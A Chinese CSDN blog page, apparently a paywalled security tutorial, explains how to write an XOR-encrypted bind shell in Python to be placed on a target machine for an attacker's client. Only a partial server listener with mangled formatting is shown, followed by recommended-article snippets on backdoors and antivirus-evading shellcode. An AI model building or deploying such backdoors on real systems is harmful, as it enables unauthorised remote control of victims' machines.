python写加密shell实用教程!

最新推荐文章于 2023-02-17 07:25:37 发布
最新推荐文章于 2023-02-17 07:25:37 发布
阅读量307 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/111311292
版权
本文是一篇关于如何使用Python编写加密Shell的教程,包括服务端和客户端的实现,讲解了构造思路、加密方法以及进阶的编译成可执行文件的方法。通过异或加密进行数据传输,同时提供了测试实例来验证其可行性。
摘要由CSDN通过智能技术生成

作者:掌控安全-冰封小天堂

0x00:前言

正常一个网站分为服务端和客户端,因为是正向的,所以服务端是在目标机器上的,客户端则是攻击者机器上,在这里要感谢MiaGz大师傅,这里很多都是参考了MiaGz大师傅的文章写出来的,进行了一点个人修改,而其中的加密方法则是参考了hacking8.com中python安全工具编写里的方法

0x01:构造思路

服务端要开启指定的监听端口,然后等待客户端来连接,s_sock.listen决定了可以有多少客户端连接,因为客户端发来的数据是用异或加密的。所以我们需要用同样的异或进行解密,完成后再用utf-8解码,从而得到明文消息,然后判断是否是推出命令。如果是则结束循环,外部大循环因为用的是同一个也会停止,如果想要断开后他依然运行可以将他们控制循环用的换掉

服务端

import socket
import os

这部分是参数设置
地址因为是本机,所以可以用空,或者127.0.01,0.0.0.0等方式

Host = ‘’;
Port = 1314;

recv函数接受的最大数据量

bufsize = 8000;
将ip和端口作为元组里的两个元素给变量
ipport = (Host,Port);

初始化对象,设置的参数都是默认的

s_sock = 
socket.socket(socket.AF_INET,socket.SOCK_STREAM);

绑定地址到套接字

s_sock.bind(ipport);

控制最大可以有多少连接,也就是组多可以有五个客户端连接过来

s_sock.listen(5);

控制循环的值

stop = False;
while not stop:

#被动的接受TCP客户端的连接,返回来的是一个元组,第一个元素是对方连接设置的各种信息,给c_sock,
#第二个元素则是目标ip和目标通过那个端口过来的 c_sock,caddr = s_sock.accept()
#将ip和端口分别给一个变量 ip,port = caddr; print(’%s connection…’%(ip));
#死循环 while True:
try:
#接受客户端发来的消息,最大数据量为bufsize变量的值
data = c_sock.recv(bufsize);
except:
#如果出现异常就关闭连接,结束循环
c_sock.close();
break;
#使用bytearray函数,将收到的数据(data)转换为一个字节数组,并且是可以修改的,给变量ceshi
ceshi = bytearray(data);
#判断数组的长度,作为终值,因为终值是小于,而且是从0开始所以刚刚好
for i in range(len(

最低0.47元/天 解锁文章
zkzq
关注
python】一文带你领略,Python中非常强大的加密库--pycryptodome
景天科技苑
08-17 1457
PyCryptodome是一个强大的Python加密库,它提供了广泛的加密算法支持,包括对称加密、非对称加密、哈希函数和消息认证码等。本文将结合实际案例,详细介绍PyCryptodome的安装、基本概念、使用场景及示例代码,帮助读者理解和使用这一强大的加密工具。
Python-简单加密
Judemots的博客
08-03 1065
1.遍历字符串 for single_char in src_str: print(single_char) 2.index函数与简单加密 index函数:检索字符串中的字符是否在给定字符串中 简单加密: alphabet_src='abcdefghijklmnopqrstuvwxyz' alphabet_tar='defghijklmnopqrstuvwxyzabc' src_str='hello world!' for single_char in src_str: if single_cha
shell-perl-python等脚本文件加密工具
10-30
shell 脚本、perl 脚本、python 脚本 等如果不想被别人看到原文件,可以使用该工具shc ,对脚本文件加密
shell脚本加密
shao.bing的专栏
07-25 1784
如何保护自己编shell程序 要保护自己编shell脚本程序,方法有很多,最简单的方法有两种:1、加密 2、设定过期时间,下面以shc工具为例说明: 一、下载安装shc工具 shc是一个加密shell脚本的工具.它的作用是把shell脚本转换为一个可执行的二进制文件.   # wget http://www.datsi.fi.upm.es/~frosal/sources/sh
shellPython密码加密方法
宫凯宁的博客
06-04 1287
为了生产安全 我们通常在配置文件或脚本中不会使用明文密码,而是使用加密后的密码。 一下是shellPython两种脚本的密码加密方式。 sh脚本修改流程 1.将明文密码通过base64编码,获取密文密码; 明文编码命令:echo abc| openssl aes-128-cbc -k 123 -base64 2.将密文密码通过base64解码; 密文解码命令:echo U2FsdGVkX18bH...
Shellcode加密原理之自己动手加密
seaaseesa的博客
02-20 1713
shellcode是一段用于利用软件漏洞而执行的代码,在实际的软件中,某些软件对允许输入的字符范围做了限制,导致检测到非法字符,从而无法成功输入shellcode。这时就需要加密shellcode。谷歌有一个开源工具ALPHA 3,可以将shellcode加密为全ascii可见字符。其大致原理根本文我们讲的是差不多的。 本文,我们要自己实现一个shellcode加密。我们就从攻防世界的一题hol...
shell加密解密脚本,用于shell脚本的加密解密
weixin_42604188的博客
02-17 942
我可以给你一个简单的shell加密解密脚本,它可以用来加密和解密shell脚本:#!/bin/bash encrypt.sh# 加密 openssl enc -aes-256-cbc -salt -in $1 -out $2# 解密 openssl enc -d -aes-256-cbc -in $1 -out $2 ...
shell:python的后门连接脚本
04-01
标题 "shell:python的后门连接脚本" 暗示了这个压缩包可能包含一个用Python编程语言编的后门程序,后门通常是指在未经授权的情况下,为远程访问和控制系统而设计的秘密通道。这样的脚本可能被黑客用于非法入侵...
基于C、Shell、CSS、PHP、Python和HTML的GnuPG加密软件设计源码
最新发布
05-30
本项目是基于C、Shell、CSS、PHP、Python和HTML的GnuPG加密软件设计源码,包含1348个文件,主要文件类型为c、h、asc、scm、txt、png、gpg、pem、po和texi。该项目适用于GnuPG加密软件的开发和设计,为用户提供了一个...
Linux-编SHELL 加密解密方法
qq_38522411的博客
11-22 3802
Linux-编SHELL 加密解密方法 我们在编SHELL脚本时,有时候需要填密码到脚本里,比如mysql备份脚本,这时我们就需要一个脚本加密解密的方法了,我使用GO语音执行Linux命令加密解密。脚本调用go脚本。 一. 使用bash64 加密 解密 1.加密 [root@izbp14ot0ykf8wyktz0kwgz ~]# echo "我是密码" | base64 2.解密 ...
Python 加密 shellcode 免杀
Sylon的博客
08-04 3422
Python 加密 shellcode 免杀 环境准备: Windows7 32 位系统; Shellcode 使用 kali linux Metasploit 生成 shellcode Windows7 需要安装的软件: Python2.7, pip install pyinstaller pywin32-217.win32-py2.7.exe ...
Python面试题大全(二):python高级语法
热门推荐
独木不成林,单弦不成音。
05-23 1万+
Python干货系列(一):python基础学习(面试题); Python干货系列(二):python高级语法; Python干货系列(三):Web开发(Flask、爬虫); Python干货系列(四):数据库篇; Python干货系列(五):测试、大数据、数据结构、架构 ...
五种方法加密python代码
qq_38205154的博客
01-17 1621
Python越来越热门了,2019年3月TIOBE编程语言排行榜上,Python更是罕见的击败了“霸榜三巨头”之一的C++,挤进前三。 Python优点很多,比如简单易学,代码量少,能做的事很多等等,和其他语言一样,Pyhton也有一些不可掩盖的缺点,版本不兼容,运行效率不高等等。 其中一个缺点,让不少开发者头疼不已,由于Python解释器开源的关系,导致Python代码无法加密,代码的安全性得不...
Python实现对文件内容进行加密
PYmili的博客
12-06 8624
Python实现对文件的内容进行加密,之前博主查询了资料看见的多半是Python把文件打包成另外一个格式或编码的文件,这样没意思了!还不如自己做一个加密程序,用来加密文件,这样,别人想随便盗取你的文件内容也得看得懂!它不香吗! ...
金三即过,这300道python高频面试都没刷,银四怎么闯?
mifffy_java的博客
03-20 586
好久没有给朋友们分享干货了,这一眨眼又是2021年的“金三银四”了,作为一名Python爱好者,我想问一句各位Python的小伙伴们,这个金三银四你们准备好了吗? 俗话说得好,肚子无货,面试慌慌!不过今天你别慌,小编这就给你送干货:《300道python高频面试+解析》,熬了几个晚上整理的东西,不仅做了pdf文档,同时还手了MD文件! 《300道python高频面试+解析》的pdf文档也好,手的MD文件也罢皆在此 →可直接扫描下方助理,免费领取! 《300道python高频面试+.
二、简单易用的Python代码加密方法(基于Cython)
白银时代的博客
01-19 3178
文章目录一、前言二、Python加密方法(基于Cython)三、Python代码加密加密后的使用3.1 编自己的代码3.2 制作setup文件3.3 生成.so(.pyd)文件3.4 使用.so(.pyd)文件四、Tips 一、前言   不知道你是不是打工人,但笔者还是忍不住在文章开头叨叨两句。笔者最近挺烦躁,工作中辛辛苦苦做的算法和代码总被人觊觎(ps:虽然也没那么多技术含量),虽然笔者不想理他们,只想安安静静的搞项目,但也架不住有人想方设法的摘桃子,这也是我把这篇文章方法疑难杂症专栏的原因。怎么办?
python:通过函数实现手机号的加密、解密
weixin_44367450的博客
01-08 4328
# 代码敲两遍:发qq给 压缩包:文件夹:姓名 文件夹第一遍 文件夹第二遍 # 作业:声明一个函数 将电话18670327812 对他进行加密 返回加密后的内容 # 解密函数:传入加密后的内容 返回的是电话号码 # 电话号码不固定 # 加密 def encryption(): content = input("请输入您的电话号码: ") if len(content) == 1...
python一个aes加密函数
09-25
### 回答1: 我可以提供一个简单的示例:import base64 from Crypto.Cipher import AESdef encrypt(key, message): # AES加密 message = message.encode('utf-8') aes = AES.new(key.encode('utf-8'), AES.MODE_CBC, b'0000000000000000') ciphertext = aes.encrypt(message) encrypted_message = base64.b64encode(ciphertext) return encrypted_messagedef decrypt(key, encrypted_message): # AES解密 ciphertext = base64.b64decode(encrypted_message) aes = AES.new(key.encode('utf-8'), AES.MODE_CBC, b'0000000000000000') message = aes.decrypt(ciphertext) return message.decode('utf-8') ### 回答2: AES加密算法是一种常用的对称密钥加密算法,可以通过Python编程语言来实现。 首先,我们需要导入Python中的`Crypto`库和相关模块: ```python from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad from Crypto.Random import get_random_bytes ``` 接下来,我们可以定义一个用于AES加密的函数,其参数包括待加密的明文、密钥和初始化向量(iv): ```python def aes_encrypt(plain_text, key, iv): cipher = AES.new(key, AES.MODE_CBC, iv) encrypted_data = cipher.encrypt(pad(plain_text, AES.block_size)) return encrypted_data ``` 在函数中,我们首先使用`AES.new()`方法创建一个AES加密实例,其中包括了密钥和CBC模式,并使用给定的iv作为初始化向量。然后,我们使用`pad()`方法对明文进行填充,使其长度满足AES加密算法的要求。最后,我们调用`encrypt()`方法进行加密处理,并返回加密后的数据。 以下是一个使用示例: ```python plain_text = b'This is a secret message.' key = get_random_bytes(16) # 随机生成16字节的密钥 iv = get_random_bytes(16) # 随机生成16字节的初始化向量 encrypted_data = aes_encrypt(plain_text, key, iv) print('Encrypted data:', encrypted_data) ``` 在上述示例中,我们生成了一个16字节的随机密钥和初始化向量,并调用`aes_encrypt()`函数进行加密操作。最后,我们输出了加密后的数据。 需要注意的是,以上代码仅仅提供了AES加密的基本功能,实际应用中还需要考虑密钥管理、安全性和其他细节方面的问题。 ### 回答3: AES(Advanced Encryption Standard)是一种常见的对称加密算法,可以用来对数据进行加密和解密。使用Python实现一个AES加密函数,需要使用到Python的密码学库,如cryptography库。 首先,我们需要安装cryptography库,可以使用pip命令进行安装: ```shell pip install cryptography ``` 接下来,使用以下代码实现AES加密函数: ```python from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import padding def aes_encrypt(key, iv, plaintext): # 创建AES加密器 cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend()) encryptor = cipher.encryptor() # 对明文进行填充 padder = padding.PKCS7(128).padder() padded_plaintext = padder.update(plaintext) + padder.finalize() # 加密密文 ciphertext = encryptor.update(padded_plaintext) + encryptor.finalize() return ciphertext # 测试 key = b'0123456789abcdef' iv = b'abcdef0123456789' plaintext = b'Hello, World!' ciphertext = aes_encrypt(key, iv, plaintext) print(ciphertext.hex()) ``` 在以上代码中,我们首先导入需要的库和模块。然后,定义了一个`aes_encrypt`函数,接收一个密钥`key`、一个初始化向量`iv`和明文`plaintext`作为参数。在函数内部,我们首先创建了一个AES加密器,并使用CBC模式进行加密。然后,使用PKCS7填充对明文进行填充。最后,使用AES加密器对填充后的明文进行加密,得到密文`ciphertext`。最后,我们使用测试数据进行测试,并打印输出密文的十六进制表示。 需要注意的是,以上代码只是一个简单的AES加密函数,实际应用中还需要考虑其他因素,如密钥的安全性、密文的完整性等。同时,解密过程与加密过程类似,可以类似地实现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值